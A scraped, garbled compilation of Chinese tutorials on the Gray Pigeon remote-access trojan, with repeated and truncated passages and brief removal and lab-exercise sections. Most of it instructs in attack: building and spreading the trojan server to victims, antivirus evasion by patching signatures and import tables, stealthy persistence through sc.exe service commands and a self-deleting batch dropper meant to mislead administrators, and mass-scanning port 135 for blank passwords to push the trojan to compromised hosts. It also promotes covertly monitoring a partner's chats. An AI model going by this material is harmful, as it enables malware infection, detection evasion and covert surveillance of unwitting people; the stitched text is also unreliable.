灰鸽子使用教程图解
灰鸽子 使用 方法 详细 说明(1)(8)
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件
。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,
取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中
选择“显示所有文件和文件夹”,然后点击“确定”。
作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这
两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就
可以进行手动清除。
二、灰鸽子的手工清除
经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下
的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除
灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电
脑的用户都会启动木马。
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务
器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~
录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和
G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和
G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,
G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件
操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。
注意:为防止误操作,清除前一定要做好备份。
简单成为灰鸽子免杀高手
2.)修改输入表
不知有的朋友是否知道,PE文件的正常运行是离不开其内部输入表函数的,而不同的程序,其内部输入表函数的名称与在文件中的位置是不一样的,所以输入表函数也成了病毒防御工作者制作特征码紧盯的地方之一。在我查出来的关于灰鸽子的特征码来看,“瑞星大哥”已经将其的一处输入表函数作为特征码了。所以掌握输入表函数免杀技巧对于新入门的朋友来说势在必行!
就这么简单?对!就这么简单!其他的例如注册表、生成新文件的名称与路径等等都可以利用此方法更改。
但是不幸的是,经过这样改后,还不足以对付例如金山、江民等品牌杀毒软件,要想对付这些杀毒软件的查杀,我们还需要对我们的木马进行进一步处理。
下面,我们开始学习输入表函数(APIName)免杀!
古人云“知己知彼,方能百战不殆!”
今天,我们就以一个病毒防御工作者的角度来做我们的免杀工作。想不被杀,就要先知道是怎么杀的,还不太懂的朋友赶紧偷偷借机恶补吧。
1.杀毒原理
通常,一个病毒防御工作者拿到一个截获或上报上来的病毒时,先是分析这个病毒文件执行后的动作,所谓“动作”,就是指病毒文件执行后会做哪些操作。例如会生成什么新文件、怎样更改注册表、怎样注册服务、打开什么端口等等。
保存后我们在回到LordPE那里,在需要更改的InternetOpenUrlA输入表函数上单击右键,在弹出的菜单里选择“编辑”,将Thunk里的信息改成000B9D5E(如图14)即可。
有的朋友要问了,刚才我们不是把那个输入表函数放到000B9D60那里了吗?到这怎么变成000B9D5E了?其实原理很简单,因为每个输入表函数前面都是有一个空格的,我们虽不用真正把那个空格加进去,但填写它的地址时一定要空出来,否则就会出错!而将000B9D60减去一个空格所占的位置,其地址正好为000B9D5E,还不十分明白的朋友在仔细看看图13,下面我们在回到LordPE,看看我们改过的输入表函数变成什么样了(如图15)?
黑客工具灰鸽子使用指导图解
黑客工具[灰鸽子]使用教程图解
Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要 自己进入安装文件夹,双击 iexplore.exe 启动软件,这时会弹出一个提示窗口,问是否要让软件随系 统启动,通常直接点“确定”。
3.完成以上操作后,再按 ctrl+y 即可呼出软件主界面。监控版必须使用会员登录才能实现监控功 能,所以呼出主界面后,应点击免费解
man 监控版“连接”按扭左侧有一个“中转”选项,是通过网络人的服务器中转优化连接速 度。通常不建议选择“中转”, 因为连接速度正常时,选上反而会使得速度变慢。在没选择的情况下, 软件会根据网络状况,自行判断是否通过服务器中转。软件还有许多设置选项,在不了解功能的情况 下,不要随意修改。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退 出”。很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装 Netman 监控版并使用另一个会员登录,在“远程 IP/ID”处 输入对方的会员 ID 和控制密码,点击“连接”即可连接远程电脑。
残秋的回忆制作
黑客工具[灰鸽子]使用教程图解
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面 填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里 是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登 录会员 ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码, 可点击“选项”-“修改密码”。
灰鸽子黑防专版使用教程
中国远程控制的佼佼者,黑客手中的得意兵刃,也是令杀毒厂商倍加头疼的首要通缉对象……
这种种造就了众人皆知的灰鸽子
今天,就让我们来研究一下这个厉害的软件
废话少说,现在开始
1.首先打开灰鸽子的主程序,是下图所示
(灰鸽子黑防专版使用教程)
2.点击自动上线,可以看到如下界面,来配置鸽子的上线地址(FTP/3322/花生壳都行)
3.将空间地址密码和自己的IP地址添好后,
更新
4.接下来配置服务端,点击图1的配置服务
端
第一个红圈内填自己刚更新的IP网页路径第二个填自己的密码(连接服务器时要用,
可不填
5.安装项一般可按默认,但自动删除一般需
选,否则被人家发现了,哈哈
(
6.
此项一般可按默认,可根据自己需要设定
7.下面两个最好都勾上,如果要自己作免
杀,就要选不加壳
8.最后点生成服务器就行了,
9.这时你只要将自己生成的木马给别人运
行就可以了,这样他就会上线如下图
如果设了密码就要输入连接密码哦
10.这时有人可能会说,我按你说的怎么没有上线呢,那么可能你是内网,需要断口映
射的
这时你可选择菜单里的内网端口映射
一切按照默认旧可以,点击生成
11.将生成的那个程序给一个在外网的电脑运行(至于用什么办法让他运行就要发挥自
己的聪明才智了)
运行后将这台电脑的IP输入VPortW服务端IP,然后依次点连接,映射就OK拉
12.
这次再将IP更新到网页上去,记住是那台
外网电脑的IP
这下子上线就没问题拉。
灰鸽子远程控制教程
灰鸽子远程控制教程灰鸽子远程控制,著名木马灰鸽子远程控制工具,附带中文版键盘记录,多功能图标修改器等!准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
(整理)灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
黑客入侵:灰鸽子2011使用教程(图解)
黑客入侵:灰鸽子2011使用教程(图解)写在前面:现在灰鸽子是越来越困难了,查杀太严重,新手基本上很难捉到鸡,建议如果只是想监控男女朋友QQ聊天记录的新手,直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀做得很好,鸽子其实不是免费的,空间也是收费的。
没必要浪费时间)灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
灰鸽子使用教程 灰鸽子如何使用?
灰鸽子使用教程灰鸽子如何使用?
导读:灰鸽子是一款远程控制软件,不过这款软件刚推出的时候是定义为公司和家庭管理的软件,由于软件设计存在缺陷,被黑客恶意使用,使得这款软件被定义为木马程序。
下面给大家介绍灰鸽子的使用教程。
1、先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的;
2、打开后灰鸽子,我们先点击ftp更新我们的动态域名;
3、更新成功在打开配置服务端,写上更新好的域名;
4、这里是运行后服务端释放的目录,大家根据自己的要求来写;
5、这个是选择用什么进程的名字,我这个是使用ie进程;
6、配置好后,就是有一个Server.exe,运行后就可以在主控端里面看到了;
7、主控端显示的界面就是这样的;
灰鸽子这款软件本身是不具备传播性的,一般是他人通过捆绑的方式进行传播,传播方式有网页传播、邮件传播、IM聊天工具传播、非法软件传播。
教程之灰鸽子VIP2006终极免杀技术-电脑资料
教程之灰鸽子VIP2006终极免杀技术-电脑资料这次给大家做一个过各种杀毒软件的免杀教程,。
这次教程主要以灰鸽子VIP2006服务端为例!现在网上很多免杀教程,我也看过很多,但是免杀效果都不是很好,用不几天就被杀了,所以真正免杀的鸽子,还是修改杀毒软件的特征码。
这样免杀效果才更好,能达到长期免杀。
今天这节课主要给大家讲过卡巴内存免杀和外表免杀,达到总体免杀,只要你学会了这种方法,以后自己做属于自己的DIY免杀鸽子就可以啦!好了废话不多说了,大家就好好看我操作吧!这是我已经生成好的VIP2006服务端,下面我们开始把服务端的需要做免杀的DLL导出来!这就是鸽子VIP2006服务端程序.exe→MAINDLL.dll→GETKEY.dll 大家看到了吧,2006少了一个hook.dll文件。
以前VIP2005里有HOOK。
DLL文件,现在2006里没有拉!这样做免杀就方便了一些!我们先把卡巴病毒库升级到最新的,然后在用卡巴查一下我们需要做免杀的这3个文件。
看到了吧,都被列为黑名单了。
介绍一下卡巴的威力吧,卡巴我个人感觉是现在杀毒软件最牛的啦。
呵呵不做广告啦。
我们先做GETKEY。
DLL也就是键盘记录钩子。
下面看我操作吧,先来一次大定位,第一次先定位5秒1000字节吧,只要是被报毒的,我们就选择。
然后进行第2次定位,5秒32字节,看好我的操作哦,别忘了删掉上次定位的。
好保存结果,然后再来一次详细的8字节定位,这样能提高免杀效率。
OK定位搞顶啦,然后我们去用C32工具来修改特征码可以用大小写修改法,也可以用跳转法,具体用什么,我们先去看看吧。
看到了吧,有字母,那我们就用UE来该大小写字母吧,我们来杀下毒吧,文件不报毒了,看看内存呢,用OLB载入内存。
被杀了,说明定位的还是不够准,那咱在来一次详细准确的4字节定位,呵呵,看来还有个来,继续。
OK最后一次详细定位结果出来啦,我们去保存一下。
我们来分析一下结果吧,第一个大小60吧,下面的都一样吧,那我们就来选择第一个,去修改特征码,用跳转法,看我操作吧,用C32工具,找到0000B1CA大概就是这里拉,大家如果不懂16进制的话,可以找UE 看哦,继续,我们把这段NOP掉,然后去下面找到程序空隙,也就是0000区吧:0000B1CB: 68 E4BE4000 PUSH 40BEE40000B1D0: E8 A7FBFFFF CALL 0000AD7C--------------------------------------------------0000B1D5新入口点 JMP 0000B916 也就是返回上面的意思吧呵呵不好意思这里因该JMP 0000B1D5 OK保存一下,我们来查下毒吧,文件不报警拉,我们内存查杀,因该找到我们刚刚保存的那个DLL,OK内存已经免杀了,我们现在看看导回服务端能不能上线。
灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
灰鸽子教程
准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start 为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
灰鸽子破解版教程
灰鸽子破解版教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
灰鸽子使用方法
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
第三步:获取帐号和密码,登录主机
攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件,进机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。
由此可见,没有扫描,自然也就没有攻击,从安全的角度的来说,个人主机最安全的系统应 该算是WINDOWS98,由于WINDOWS98几乎不开启任何服务,自然也没有任何开放端口,没有端 口,对于这类系统攻击的可能性就大大降低。当然,XP在打了SP2的补丁后,等于有了一个 基于状态的个人防火墙,相对安全性也提高了很多。
在这些工具中,国产的X-scan与流光可算的上是两个“利器”,这两个工具不但具有相当快 的扫描速度和精确度(个人感觉X-scan在扫描速度上可能更快一点),同时还是发起攻击的 第一手选择,当然在攻击方面,流光更为强悍些。
除了常见个WWW(80)、FTP(21)、TELNET(23)等,查查十大高风险事件,我们就知道, 攻击者通常还对下列端口很感兴趣:
第五步:窃取网络资源和特权
攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;窃取帐号密码、 个人资料等。
三、网络攻击的原理和手法
1、从扫描开始
扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。 常见的扫描工具有X-scan、superscan、流光、X-port等。
灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明
灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。
现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径!注:本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射!介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备(去掉忽略ICF防火墙前面的勾~)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具!============================================================== 配置好服务端以后接下来测试一下鸽子是否能上线!只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡!!用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢~~扫完以后DOS界面会自动关系在文件目录下出现Result.txt一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个host.txt 的文件!(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了!(如图11)就先扫到这里其实还有好多呢!!关闭NTscan以后会在目录下自动建出一个NTscan.txt的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成!不用说大家因该都会。
处理后的IP 连空格都需要去掉!(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开!(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确!把刚才找到的NTscan.txt文件后缀改成lst为NTscan.lst 呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤!(如图14)下一步导出过滤好的IP另存为23.txt文件!操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续!我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了!(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本!(如图16)打来SecureCRT.EXE —>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~==============此文章只供参考学习若使用给别人带来损失本人概不负责==============。
灰鸽子2010黑防专版教程
灰鸽子2010黑防专版点击右侧下载列表下载1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持W indows9x/ME/2000/Xp/2003。
L003002031-灰鸽子木马利用与防护
4、灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,我们需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端,点击“确定”
8,右击setup.exse,选择“文件下载”,然后将该文件保存到win2003的桌面。此时通过灰鸽子
对XP系统的文件进行操作,以及查看XP信息,远程发送命令、编辑注册表、远程监控、命令广播
等功能。
9实验小结
通过本次实验,我们可以学会灰鸽子木马的使用,从而理解木马的工作原理及木马的本来面目。
5启动XP系统,administrator ,密码123456,登录到XP系统。点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。
课程编写
类别
内容
实验课题名称
L003002031-灰鸽子木马利用与防护
实验目的与要求
了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击
实验环境
VPC1(虚拟PC)
操作系统类型:windows server 2003和windows XP professional,网络接口:本地连接
VPC1连接要求
PC网络接口,本地连接与实验网络直连
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
灰鸽子使用教程图解(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
优化连接速度。
通常不建议选择“中转”,因为连接速度正常时,选上反而会使得速度变慢。
在没选择的情况下,软件会根据网络状况,自行判断是否通过服务器中转。
软件还有许多设置选项,在不了解功能的情况下,不要随意修改。
第二部份:灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
